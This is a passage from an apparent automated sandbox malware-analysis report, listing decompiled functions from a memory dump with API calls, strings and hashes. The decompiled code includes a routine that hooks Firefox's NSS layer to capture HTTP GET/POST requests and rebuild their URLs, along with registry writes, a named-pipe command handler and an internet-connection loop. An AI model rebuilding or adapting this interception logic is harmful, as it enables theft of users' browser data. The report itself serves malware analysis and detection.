      • Part of subcall function 004100F6: CryptHashData.ADVAPI32(?,00000010), ref: 00410142
      • Part of subcall function 004100F6: CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 00410159
      • Part of subcall function 004100F6: CryptDestroyHash.ADVAPI32(?), ref: 00410170
      • Part of subcall function 004100F6: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0041017A
    • RegCloseKey.ADVAPI32(?), ref: 0040873C
    • PathCombineW.SHLWAPI(?,software\microsoft\windows\currentversion\explorer,?,?,?,00000000), ref: 00408781
    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000,?,00000000), ref: 004087A6
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,00000000), ref: 004087C6
    • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,?,?,00000000), ref: 004087F0
    • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00408804
      • Part of subcall function 0040F0C0: HeapFree.KERNEL32(00000000,00000000,0040B690,00000000,00000001), ref: 0040F0D3
    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00408828
    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040884E
    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00408877
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CryptValue$Hash$CreateOpen$CloseCombineContextDeletePathQuery$AcquireDataDestroyEnumFreeHeapParamRelease
    • String ID: *$software\microsoft\windows\currentversion\explorer
    • API String ID: 1179558880-1506458415
    • Opcode ID: f37ea75c7dbe27713caf3b3409e7e0d1b945bb1404c9c454d1352a4d168736e8
    • Instruction ID: ad3c37aecbf0aac38b0feac2d031107020245f123866567aa47d907a8239d95a
    • Opcode Fuzzy Hash: f37ea75c7dbe27713caf3b3409e7e0d1b945bb1404c9c454d1352a4d168736e8
    • Instruction Fuzzy Hash: 2E916B71500208AFEF20DFA5CD88EEE7BBDEB45740B20813AF955A2195EB34DD45CB98
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00406CD8, Relevance: 31.7, APIs: 2, Strings: 16, Instructions: 248libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 63%
    			E00406CD8(intOrPtr _a4, char* _a8, intOrPtr _a12) {
				char _v32;
				intOrPtr _v48;
				char _v52;
				char _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				char _v76;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v96;
				char _v1100;
				signed char _v1125;
				signed char _v1126;
				signed char _v1127;
				signed char _v1128;
				signed int _v1130;
				char _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				char _v1144;
				char _v1148;
				char _v1149;
				char _v1152;
				intOrPtr _v1164;
				intOrPtr _v1172;
				intOrPtr _v1180;
				char _v1193;
				void* __edi;
				void* __esi;
				signed int _t73;
				intOrPtr _t84;
				_Unknown_base(*)()* _t86;
				void* _t87;
				void* _t94;
				void* _t96;
				void* _t103;
				signed int _t104;
				_Unknown_base(*)()* _t113;
				void* _t114;
				void* _t117;
				char* _t121;
				void* _t128;
				void* _t140;
				intOrPtr _t144;
				void* _t145;
				void* _t147;
				intOrPtr _t149;
				signed int _t155;
				void* _t157;

				_t157 = (_t155 & 0xfffffff8) - 0x47c;
				_t121 = _a8;
				_t149 = _a4;
				if(_t149 == 0 || _t121 == 0) {
					L38:
					_t73 =  *0x4169e0(_t149, _t121, _a12);
					goto L39;
				} else {
					_t143 = _a12;
					if(_a12 - 0x15 > 0x95ffe) {
						goto L38;
					}
					_t124 = _t121;
					if(E0040F131("GET ", _t121, 4) == 0) {
						L5:
						if(E0040F776(_t124, _t121, _t143, 2,  &_v1148) == 0 || _v1148 != 8 || E0040F131(_t78, "HTTP/1.", 7) != 0) {
							goto L38;
						} else {
							_v1164 = E0040F776("HTTP/1.", _t121, _t143, 1,  &_v1144);
							_v1172 = E0040F776("HTTP/1.", _t121, _t143, "Host",  &_v1152);
							if(_v1180 == 0) {
								goto L38;
							}
							_t84 = _v1144;
							if(_t84 <= 0) {
								goto L38;
							}
							_t144 = _v1136;
							if(_t84 + _t144 > 0x3d4) {
								goto L38;
							}
							_t86 =  *0x4169ec; // 0x0
							if(_t86 != 0) {
								L13:
								_t87 =  *_t86( &_v1132);
								_t128 = _t149;
								if(_t87 != 0) {
									goto L38;
								}
								asm("rol word [esp+0x22], 0x8");
								E0040F173( &_v1100,  &_v1100, _t87, 0x444);
								_v72 = E0040F776(_t128, _t121, _a12, "Referer",  &_v52);
								_v96 = E0040F776(_t128, _t121, _a12, "Content-Type",  &_v76);
								_v1193 = 0;
								if( *((intOrPtr*)(_t149 + 0x14)) <= 0) {
									L20:
									_t94 = 7;
									_push(_t94);
									_push("http://");
									L21:
									_push( &_v1100);
									_v88 = E0040F0FC();
									if(_v1152 == 0 || _t144 <= 0) {
										_push(_v1125 & 0x000000ff);
										_push(_v1126 & 0x000000ff);
										_push(_v1127 & 0x000000ff);
										_push(_v1128 & 0x000000ff);
										_push("%u.%u.%u.%u");
										_t145 = 0x10;
										_t96 = E0040F5E0(_t95, _t145, _t157 + _t95 + 0x58);
										_t157 = _t157 + 0x14;
										_v76 = _v76 + _t96;
									} else {
										E0040F0FC(_t157 + _t95 + 0x48, _v1140, _t144);
										_v88 = _v88 + _t144;
									}
									if(_v1149 == 0) {
										if(_v1130 == 0x50) {
											goto L30;
										}
										goto L29;
									} else {
										if(_v1130 != 0x1bb) {
											L29:
											_push(_v1130 & 0x0000ffff);
											_push(":%u");
											_t147 = 7;
											_v76 = _v76 + E0040F5E0(_v1130 & 0x0000ffff, _t147, _t157 + _v76 + 0x4c);
											L30:
											_t135 = _t157 + _v76 + 0x48;
											_v88 = _v88 + E0040F0FC(_t157 + _v76 + 0x48, _v1148, _v1144);
											if( *_t121 != 0x47) {
												E0040F0FC( &_v84, "POST", 5);
												_v72 = 4;
												if(_v64 != 0 && _v48 > 0) {
													_v52 = E0040F776(_t135, _t121, _a12, 3,  &_v32);
												}
											} else {
												E0040F0FC( &_v84, "GET", 4);
												_v72 = 3;
											}
											_v56 = E00404326(_t135) & 0xffffff00 | _t101 != 0x00000000;
											_t103 = E0040C290(_t140,  &_v1100, _t101, 0);
											_t104 = E0040F0C0(_t101);
											if(_t103 != 0) {
												_t149 = _a4;
												_t121 = _a8;
												goto L38;
											} else {
												_t73 = _t104 | 0xffffffff;
												L39:
												return _t73;
											}
										}
										goto L30;
									}
								}
								_t113 =  *0x4169e8; // 0x0
								if(_t113 != 0) {
									L17:
									_t114 =  *_t113( *((intOrPtr*)(_t149 + 0x14)));
									_t139 = _t114;
									if(_t114 == 0 || E0040F131("NSS layer", _t139, 9) != 0) {
										goto L20;
									} else {
										_t117 = 8;
										_push(_t117);
										_v1149 = 1;
										_push("https://");
										goto L21;
									}
								}
								_t113 = GetProcAddress( *0x4169e4, "PR_GetNameForIdentity");
								 *0x4169e8 = _t113;
								if(_t113 == 0) {
									goto L20;
								}
								goto L17;
							}
							_t86 = GetProcAddress( *0x4169e4, "PR_GetPeerName");
							 *0x4169ec = _t86;
							if(_t86 == 0) {
								goto L38;
							}
							goto L13;
						}
					}
					_t124 = _t121;
					if(E0040F131("POST ", _t121, 5) != 0) {
						goto L38;
					}
					goto L5;
				}
			}




















































    0x00406cde
    0x00406ce5
    0x00406ce9
    0x00406cef
    0x00407014
    0x00407019
    0x00000000
    0x00406cfd
    0x00406cfd
    0x00406d08
    0x00000000
    0x00000000
    0x00406d15
    0x00406d1e
    0x00406d36
    0x00406d46
    0x00000000
    0x00406d6b
    0x00406d79
    0x00406d93
    0x00406d97
    0x00000000
    0x00000000
    0x00406d9d
    0x00406da3
    0x00000000
    0x00000000
    0x00406da9
    0x00406db4
    0x00000000
    0x00000000
    0x00406dba
    0x00406dc1
    0x00406de1
    0x00406de7
    0x00406dea
    0x00406ded
    0x00000000
    0x00000000
    0x00406df3
    0x00406e04
    0x00406e1f
    0x00406e40
    0x00406e47
    0x00406e4c
    0x00406e9d
    0x00406e9f
    0x00406ea0
    0x00406ea1
    0x00406ea6
    0x00406eaa
    0x00406eb5
    0x00406ebc
    0x00406edf
    0x00406ee5
    0x00406eeb
    0x00406ef1
    0x00406ef2
    0x00406efd
    0x00406efe
    0x00406f03
    0x00406f06
    0x00406ec2
    0x00406ecc
    0x00406ed1
    0x00406ed1
    0x00406f12
    0x00406f28
    0x00000000
    0x00000000
    0x00000000
    0x00406f14
    0x00406f1e
    0x00406f2a
    0x00406f36
    0x00406f37
    0x00406f42
    0x00406f48
    0x00406f51
    0x00406f61
    0x00406f6b
    0x00406f7c
    0x00406fa0
    0x00406fad
    0x00406fb8
    0x00406fd7
    0x00406fd7
    0x00406f7e
    0x00406f86
    0x00406f8b
    0x00406f8b
    0x00406ff1
    0x00406ff8
    0x00407000
    0x00407007
    0x0040700e
    0x00407011
    0x00000000
    0x00407009
    0x00407009
    0x00407022
    0x00407028
    0x00407028
    0x00407007
    0x00000000
    0x00406f20
    0x00406f12
    0x00406e4e
    0x00406e55
    0x00406e71
    0x00406e74
    0x00406e77
    0x00406e7b
    0x00000000
    0x00406e8d
    0x00406e8f
    0x00406e90
    0x00406e91
    0x00406e96
    0x00000000
    0x00406e96
    0x00406e7b
    0x00406e62
    0x00406e68
    0x00406e6f
    0x00000000
    0x00000000
    0x00000000
    0x00406e6f
    0x00406dce
    0x00406dd4
    0x00406ddb
    0x00000000
    0x00000000
    0x00000000
    0x00406ddb
    0x00406d46
    0x00406d27
    0x00406d30
    0x00000000
    0x00000000
    0x00000000
    0x00406d30

    APIs
    • GetProcAddress.KERNELBASE(PR_GetPeerName,?), ref: 00406DCE
    • GetProcAddress.KERNELBASE(PR_GetNameForIdentity,?), ref: 00406E62
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc
    • String ID: %u.%u.%u.%u$:%u$Content-Type$GET$GET $HTTP/1.$Host$NSS layer$P$POST$POST $PR_GetNameForIdentity$PR_GetPeerName$Referer$http://$https://
    • API String ID: 190572456-492401960
    • Opcode ID: 59a1b8618d7fe85ff5050732f71d4bd05903e40b059016dc8ac23c37b7ac1504
    • Instruction ID: cd41821a1ffcb6a837b3746b6c584dd423b21d578121063254a3413d32c58231
    • Opcode Fuzzy Hash: 59a1b8618d7fe85ff5050732f71d4bd05903e40b059016dc8ac23c37b7ac1504
    • Instruction Fuzzy Hash: EC91B1B1608381ABD7309F65DC45B6B77E8AB84308F00493FB685B61D1E778E918876F
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040B0A9, Relevance: 25.6, APIs: 17, Instructions: 136filesynchronizationpipeCOMMON
    Download Yara Rule
    C-Code - Quality: 96%
    			E0040B0A9(void _a4) {
				long _v8;
				void _v12;
				struct _OVERLAPPED* _v16;
				void* _v20;
				void _t59;
				void* _t71;
				long _t75;
				void** _t81;

				_t81 = _a4;
				_v20 = CreateMutexW(0x417680, 0, _t81[4]);
				SetEvent(_t81[2]);
				DisconnectNamedPipe( *_t81);
				if(WaitForSingleObject(_t81[1], 0) != 0) {
					_t75 = 4;
					do {
						if(ConnectNamedPipe( *_t81, 0) == 1) {
							_v12 = 0;
							_v8 = 0;
							_v16 = 0;
							_a4 = 0;
							if(ReadFile( *_t81,  &_v12, _t75,  &_v8, 0) != 0 && _v8 == _t75 && ReadFile( *_t81,  &_a4, _t75,  &_v8, 0) != 0 && _v8 == _t75) {
								_t59 = _a4;
								if(_t59 > 0xa00000) {
									_t59 = 0;
									_a4 = 0;
								}
								if(_t59 <= 0) {
									L13:
									_v12 = _t81[3]( &_a4);
									WriteFile( *_t81,  &_v12, _t75,  &_v8, 0);
									if(_a4 > 0xa00000) {
										_a4 = 0;
									}
									WriteFile( *_t81,  &_a4, _t75,  &_v8, 0);
									if(_a4 != 0) {
										WriteFile( *_t81, _v16, _a4,  &_v8, 0);
									}
									FlushFileBuffers( *_t81);
								} else {
									_t71 = E0040F0A8(_t59);
									_v16 = _t71;
									if(_t71 != 0 && ReadFile( *_t81, _t71, _a4,  &_v8, 0) != 0 && _v8 == _a4) {
										goto L13;
									}
								}
							}
							E0040F0C0(_v16);
							DisconnectNamedPipe( *_t81);
						}
					} while (WaitForSingleObject(_t81[1], 0) != 0);
				}
				CloseHandle(_v20);
				SetEvent(_t81[2]);
				_push(0);
				return RtlExitUserThread();
			}











    0x0040b0b0
    0x0040b0c8
    0x0040b0cb
    0x0040b0d3
    0x0040b0e5
    0x0040b0ee
    0x0040b0ef
    0x0040b0fb
    0x0040b10d
    0x0040b110
    0x0040b113
    0x0040b116
    0x0040b121
    0x0040b153
    0x0040b15b
    0x0040b15d
    0x0040b15f
    0x0040b15f
    0x0040b164
    0x0040b18f
    0x0040b19d
    0x0040b1ab
    0x0040b1b8
    0x0040b1ba
    0x0040b1ba
    0x0040b1c9
    0x0040b1d2
    0x0040b1e1
    0x0040b1e1
    0x0040b1e9
    0x0040b166
    0x0040b166
    0x0040b16b
    0x0040b170
    0x00000000
    0x00000000
    0x0040b170
    0x0040b164
    0x0040b1f2
    0x0040b1f9
    0x0040b1f9
    0x0040b209
    0x0040b211
    0x0040b215
    0x0040b21e
    0x0040b224
    0x0040b22e

    APIs
    • CreateMutexW.KERNEL32(00417680,00000000,?), ref: 0040B0BF
    • SetEvent.KERNEL32(?), ref: 0040B0CB
    • DisconnectNamedPipe.KERNEL32(?), ref: 0040B0D3
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040B0DD
    • ConnectNamedPipe.KERNEL32(?,00000000), ref: 0040B0F2
    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0040B119
    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0040B13C
    • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040B17D
    • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 0040B1AB
    • WriteFile.KERNEL32(?,00A00000,00000004,?,00000000), ref: 0040B1C9
    • WriteFile.KERNEL32(?,?,00A00000,?,00000000), ref: 0040B1E1
    • FlushFileBuffers.KERNEL32(?), ref: 0040B1E9
    • DisconnectNamedPipe.KERNEL32(?,?), ref: 0040B1F9
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040B203
    • CloseHandle.KERNEL32(?), ref: 0040B215
    • SetEvent.KERNEL32(?), ref: 0040B21E
    • RtlExitUserThread.NTDLL(00000000), ref: 0040B225
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$NamedPipeReadWrite$DisconnectEventObjectSingleWait$BuffersCloseConnectCreateExitFlushHandleMutexThreadUser
    • String ID:
    • API String ID: 1315446275-0
    • Opcode ID: bcbed62debb83a4ae83eefff702aa1cf653722968e9c94ca2f7a0362f8bedbab
    • Instruction ID: a43f95dd44fd58cc713da7751d4df5839c480342773b17c23f9f6c0b76a3511f
    • Opcode Fuzzy Hash: bcbed62debb83a4ae83eefff702aa1cf653722968e9c94ca2f7a0362f8bedbab
    • Instruction Fuzzy Hash: 1C513676900108FFDB219F90EC48DEEBBB9EF48380B11847AF956E6164DB319A41DB58
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040A90D, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 110networksynchronizationthreadCOMMON
    Download Yara Rule
    C-Code - Quality: 95%
    			E0040A90D() {
				char _v12;
				HANDLE* _v48;
				long _v52;
				void _v64;
				void* __esi;
				void* _t23;
				intOrPtr _t28;
				intOrPtr _t35;
				intOrPtr _t37;
				void* _t42;
				void* _t47;
				void* _t48;
				void* _t50;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t64;

				E0040F173( &_v12,  &_v12, 0, 8);
				L004042E5();
				E00414B7A();
				E004082DF();
				 *0x416fe4(0x4169f0, _t47, _t50, _t42);
				E0041208C();
				E0040F173(SetThreadPriority(GetCurrentThread(), 2), 0x416a88, 0, 0x10);
				 *0x416a8c = CreateEventW(0, 1, 0, 0);
				E00414B37();
				_t23 = InternetOpenA( *0x4176a0, 0, 0, 0, 0);
				 *0x416a90 = _t23;
				_v64 = 0xea60;
				InternetSetOptionA(_t23, 2,  &_v64, 4);
				E0040B826(0);
				E00407518(0x4161c4,  &_v64, 0,  *0x416e28, 0xffffffff);
				_t28 =  *0x416c34; // 0x25df5a8
				_t4 = _t28 + 0x28; // 0x25df8e0
				_t48 = E0040B231( &_v64, 0, E0040A79B,  *_t4);
				 *0x416796 = 0;
				 *0x416a88 = 0;
				L1:
				L1:
				if(WaitForSingleObject( *0x416a8c, 0x14) == 0) {
					 *0x416a88 = 1;
				}
				_t61 =  *0x416a88; // 0x0
				if(_t61 != 0) {
					goto L9;
				}
				_t37 =  *0x416c34; // 0x25df5a8
				_t5 = _t37 + 0x30; // 0x25df930
				if(E0040B355( *_t5) != 0) {
					goto L1;
				} else {
					_t63 =  *0x416a88; // 0x0
					if(_t63 == 0) {
						E0040A7DD( &_v52);
						WaitForSingleObject( *0x416a8c, 0xffffffff);
						while(1) {
							_t64 =  *0x416a88; // 0x0
							if(_t64 <= 0) {
								goto L9;
							}
							Sleep(0x14);
						}
					}
				}
				L9:
				WaitForMultipleObjects(_v52, _v48, 1, 0xffffffff);
				E004121D7( &_v52);
				CloseHandle( *0x416a8c);
				InternetCloseHandle( *0x416a90);
				_t35 =  *0x416c34; // 0x25df5a8
				_t10 = _t35 + 0x28; // 0x25df8e0
				return E0040B300(_t48,  *_t10);
			}



















    0x0040a923
    0x0040a928
    0x0040a92d
    0x0040a932
    0x0040a93c
    0x0040a942
    0x0040a95e
    0x0040a970
    0x0040a975
    0x0040a984
    0x0040a994
    0x0040a999
    0x0040a9a1
    0x0040a9a9
    0x0040a9bb
    0x0040a9c0
    0x0040a9c5
    0x0040a9d2
    0x0040a9d4
    0x0040a9da
    0x00000000
    0x0040a9e0
    0x0040a9f0
    0x0040a9f2
    0x0040a9f2
    0x0040a9f8
    0x0040a9fe
    0x00000000
    0x00000000
    0x0040aa00
    0x0040aa05
    0x0040aa0f
    0x00000000
    0x0040aa11
    0x0040aa11
    0x0040aa17
    0x0040aa1e
    0x0040aa2b
    0x0040aa3b
    0x0040aa3b
    0x0040aa41
    0x00000000
    0x00000000
    0x0040aa35
    0x0040aa35
    0x0040aa3b
    0x0040aa17
    0x0040aa43
    0x0040aa4e
    0x0040aa58
    0x0040aa63
    0x0040aa6f
    0x0040aa75
    0x0040aa7a
    0x0040aa8a

    APIs
      • Part of subcall function 00414B7A: PathCombineW.SHLWAPI(?,025DF5A8,025DF770,00000000), ref: 00414BA1
      • Part of subcall function 00414B7A: PathCombineW.SHLWAPI(00417478,00417478,?), ref: 00414BB0
    • RtlInitializeCriticalSection.NTDLL(004169F0), ref: 0040A93C
    • GetCurrentThread.KERNEL32 ref: 0040A949
    • SetThreadPriority.KERNEL32(00000000), ref: 0040A950
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00416A88,00000000,00000010), ref: 0040A96A
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 0040A984
    • InternetSetOptionA.WININET ref: 0040A9A1
      • Part of subcall function 0040B826: CharLowerBuffA.USER32(00000000,00000031,?,-80000002,025DF9A0,025DF870,00000001,?,00000002), ref: 0040B959
    • WaitForSingleObject.KERNEL32(00000014,0040A79B,025DF8E0,000000FF), ref: 0040A9E8
    • WaitForSingleObject.KERNEL32(000000FF,025DF930), ref: 0040AA2B
    • Sleep.KERNEL32(00000014), ref: 0040AA35
    • WaitForMultipleObjects.KERNEL32(0000EA60,0000EA60,00000001,000000FF), ref: 0040AA4E
    • CloseHandle.KERNEL32 ref: 0040AA63
    • InternetCloseHandle.WININET ref: 0040AA6F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: InternetWait$CloseCombineHandleObjectPathSingleThread$BuffCharCreateCriticalCurrentEventInitializeLowerMultipleObjectsOpenOptionPrioritySectionSleep
    • String ID: `
    • API String ID: 1774169687-1850852036
    • Opcode ID: e771aee4983f8c44a5ce70beee52ba52a4e7459caebc41cb25a7d5c13b928f2c
    • Instruction ID: a1826f101b3d188991e062ca2f9a02fdd68f73e14a91bc899c14a59b73f0d7f6
    • Opcode Fuzzy Hash: e771aee4983f8c44a5ce70beee52ba52a4e7459caebc41cb25a7d5c13b928f2c
    • Instruction Fuzzy Hash: F041CC71144300AFC710BFA1ED49EDA3A68EB053A9B12C23AF214A25F1CB34C850DB6E
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040683F, Relevance: 22.7, APIs: 15, Instructions: 163sleepfilesynchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040683F(void* __eflags) {
				intOrPtr _v12;
				intOrPtr _v20;
				void* __ecx;
				void* __esi;
				intOrPtr _t23;
				WCHAR* _t27;
				void* _t28;
				WCHAR* _t29;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t35;
				long _t38;
				intOrPtr _t39;
				intOrPtr _t41;
				intOrPtr _t47;
				signed int _t49;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t61;
				void* _t64;
				intOrPtr _t65;
				void* _t68;
				void* _t70;

				E004082DF();
				 *0x4167c8 = CreateEventW(0, 1, 0, 0);
				E0040B770(0x4167d0);
				_t23 =  *0x416c34; // 0x25df5a8
				_t1 = _t23 + 0xc; // 0x25df7b0
				PathCombineW(0x4167d0, 0x4167d0,  *_t1);
				 *0x4169d8 = CreateFileW(0x4167d0, 0x80000000, 0, 0, 3, 0, 0);
				E0040BC40();
				_t27 = L004042E5();
				 *0x4167c0 = _t27;
				_t28 = CreateFileW(_t27, 0x80000000, 0, 0, 4, 0, 0);
				 *0x4167cc = _t28;
				if(_t28 == 0xffffffff) {
					 *0x4167cc = 0;
				}
				_t29 = E00414B7A();
				 *0x4167c4 = _t29;
				_t30 = CreateFileW(_t29, 0x80000000, 0, 0, 4, 0, 0);
				 *0x4169dc = _t30;
				_t73 = _t30 - 0xffffffff;
				if(_t30 == 0xffffffff) {
					 *0x4169dc = 0;
				}
				_t31 =  *0x416c34; // 0x25df5a8
				_t2 = _t31 + 0x2c; // 0x25df908
				_v20 = E0040B231(_t64, _t73, E004066BC,  *_t2);
				_t33 =  *0x416c34; // 0x25df5a8
				_t4 = _t33 + 0x28; // 0x25df8e0
				_t34 = E0040B355( *_t4);
				_t74 = _t34;
				if(_t34 != 0) {
					_t59 =  *0x416c34; // 0x25df5a8
					_t5 = _t59 + 0x28; // 0x25df8e0
					E0040B37A(_t74,  *_t5, 3, 0, 0, 0, 0);
					while(1) {
						_t61 =  *0x416c34; // 0x25df5a8
						_t6 = _t61 + 0x28; // 0x25df8e0
						if(E0040B355( *_t6) == 0) {
							goto L8;
						}
						Sleep(0x14);
					}
				}
				L8:
				_t70 = E0040AA9C;
				do {
					_t35 =  *0x416c34; // 0x25df5a8
					_t7 = _t35 + 0x28; // 0x25df8e0
					if(E0040B355( *_t7) == 0) {
						_t65 =  *0x416c34; // 0x25df5a8
						_t49 = 0;
						_t68 = E0040BA69( *((intOrPtr*)(_t65 + ((_t49 & 0xffffff00 | ( *0x416cd0 & 0x00000001) != 0x00000000) + 5) * 4)));
						while(E00407873(0, _t65, _t70 -  *0x416d84, _t68) == 0) {
							Sleep(0x14);
						}
						while(1) {
							_t57 =  *0x416c34; // 0x25df5a8
							_t14 = _t57 + 0x28; // 0x25df8e0
							if(E0040B355( *_t14) != 0) {
								goto L16;
							}
							Sleep(0x14);
						}
					}
					L16:
					E0040BC89(0x4167d0);
					Sleep(0x64);
					_t38 = WaitForSingleObject( *0x4167c8, 0x32);
					_t80 = _t38;
				} while (_t38 != 0);
				_t39 =  *0x416c34; // 0x25df5a8
				_t15 = _t39 + 0x28; // 0x25df8e0
				E0040B37A(_t80,  *_t15, 3, 0, 0, 0, 0);
				while(1) {
					_t41 =  *0x416c34; // 0x25df5a8
					_t16 = _t41 + 0x28; // 0x25df8e0
					if(E0040B355( *_t16) == 0) {
						break;
					}
					Sleep(0x14);
				}
				CloseHandle( *0x4167c8);
				CloseHandle( *0x4167cc);
				CloseHandle( *0x4169dc);
				CloseHandle( *0x4169d8);
				_t47 =  *0x416c34; // 0x25df5a8
				_t17 = _t47 + 0x2c; // 0x25df908
				return E0040B300(_v12,  *_t17);
			}




























    0x00406844
    0x00406856
    0x00406862
    0x00406867
    0x0040686c
    0x00406871
    0x0040688a
    0x0040688f
    0x00406894
    0x004068a1
    0x004068a6
    0x004068ac
    0x004068b4
    0x004068b6
    0x004068b6
    0x004068bc
    0x004068c9
    0x004068ce
    0x004068d4
    0x004068d9
    0x004068dc
    0x004068de
    0x004068de
    0x004068e4
    0x004068e9
    0x004068f6
    0x004068fa
    0x004068ff
    0x00406902
    0x00406907
    0x00406909
    0x0040690b
    0x00406916
    0x00406919
    0x00406928
    0x00406928
    0x0040692d
    0x00406937
    0x00000000
    0x00000000
    0x00406922
    0x00406922
    0x00406928
    0x00406939
    0x00406939
    0x0040693e
    0x0040693e
    0x00406943
    0x0040694d
    0x00406956
    0x0040695e
    0x0040696d
    0x00406979
    0x00406973
    0x00406973
    0x00406998
    0x00406998
    0x0040699d
    0x004069a7
    0x00000000
    0x00000000
    0x00406992
    0x00406992
    0x00406998
    0x004069a9
    0x004069aa
    0x004069b1
    0x004069bf
    0x004069c5
    0x004069c5
    0x004069cd
    0x004069d8
    0x004069db
    0x004069ea
    0x004069ea
    0x004069ef
    0x004069f9
    0x00000000
    0x00000000
    0x004069e4
    0x004069e4
    0x00406a01
    0x00406a0d
    0x00406a19
    0x00406a25
    0x00406a2b
    0x00406a30
    0x00406a41

    APIs
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00406850
      • Part of subcall function 0040B770: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,00406408,?,025DF908), ref: 0040B791
    • PathCombineW.SHLWAPI(004167D0,004167D0,025DF7B0), ref: 00406871
    • CreateFileW.KERNEL32(004167D0,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00406884
      • Part of subcall function 0040BC40: PathCombineW.SHLWAPI(?,?,025DF5A8), ref: 0040BC63
      • Part of subcall function 0040BC40: CreateDirectoryW.KERNEL32(?,00000000), ref: 0040BC72
      • Part of subcall function 0040BC40: SetFileAttributesW.KERNEL32(?,00000006), ref: 0040BC81
    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000004,00000000,00000000), ref: 004068A6
    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000004,00000000,00000000), ref: 004068CE
    • Sleep.KERNEL32(00000014,025DF8E0,025DF8E0,00000003,00000000,00000000,00000000,00000000,025DF8E0,Function_000066BC,025DF908), ref: 00406922
    • Sleep.KERNEL32(00000014,-0000C2E8,00000000,025DF5A8,025DF8E0,025DF8E0,Function_000066BC,025DF908), ref: 00406973
    • Sleep.KERNEL32(00000014,025DF8E0,-0000C2E8,00000000), ref: 00406992
    • Sleep.KERNEL32(00000064,004167D0,025DF8E0,025DF8E0,Function_000066BC,025DF908), ref: 004069B1
    • WaitForSingleObject.KERNEL32(00000032), ref: 004069BF
    • Sleep.KERNEL32(00000014,025DF8E0,025DF8E0,00000003,00000000,00000000,00000000,00000000), ref: 004069E4
      • Part of subcall function 0040B300: SetEvent.KERNEL32(?,00000000,0040AA84,025DF8E0), ref: 0040B30A
      • Part of subcall function 0040B300: WaitForSingleObject.KERNEL32(?,000000FF,0000EA60,00000000,00000000,00000000,00000000,00000000), ref: 0040B323
      • Part of subcall function 0040B300: CloseHandle.KERNEL32(00000000), ref: 0040B32B
      • Part of subcall function 0040B300: CloseHandle.KERNEL32(?), ref: 0040B334
      • Part of subcall function 0040B300: CloseHandle.KERNEL32(?), ref: 0040B33D
    • CloseHandle.KERNEL32(025DF8E0), ref: 00406A01
    • CloseHandle.KERNEL32 ref: 00406A0D
    • CloseHandle.KERNEL32 ref: 00406A19
    • CloseHandle.KERNEL32 ref: 00406A25
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$CreateSleep$File$Path$CombineEventObjectSingleWait$AttributesDirectoryFolderSpecial
    • String ID:
    • API String ID: 4283066563-0
    • Opcode ID: 3ea9ad353ccd514ac0e9652666e678f886fe664f8563c83084baa964af4f711d
    • Instruction ID: c1f1752dcda3a5e67e585e269ea24b289866ac7704f654a8e7158adc096548e9
    • Opcode Fuzzy Hash: 3ea9ad353ccd514ac0e9652666e678f886fe664f8563c83084baa964af4f711d
    • Instruction Fuzzy Hash: 03517CB5101250AFC620AF66EE09F873B79EB89714B13813AF601A72F1CB75C811DB6C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004051FC, Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 324libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 88%
    			E004051FC() {
				int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v68;
				char _v72;
				int _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				int _v92;
				char _v100;
				void* _v104;
				char _v108;
				intOrPtr* _v116;
				intOrPtr* _v128;
				intOrPtr* _v132;
				char _v136;
				intOrPtr* _v144;
				char _v148;
				char _v164;
				intOrPtr* _v168;
				intOrPtr* _v172;
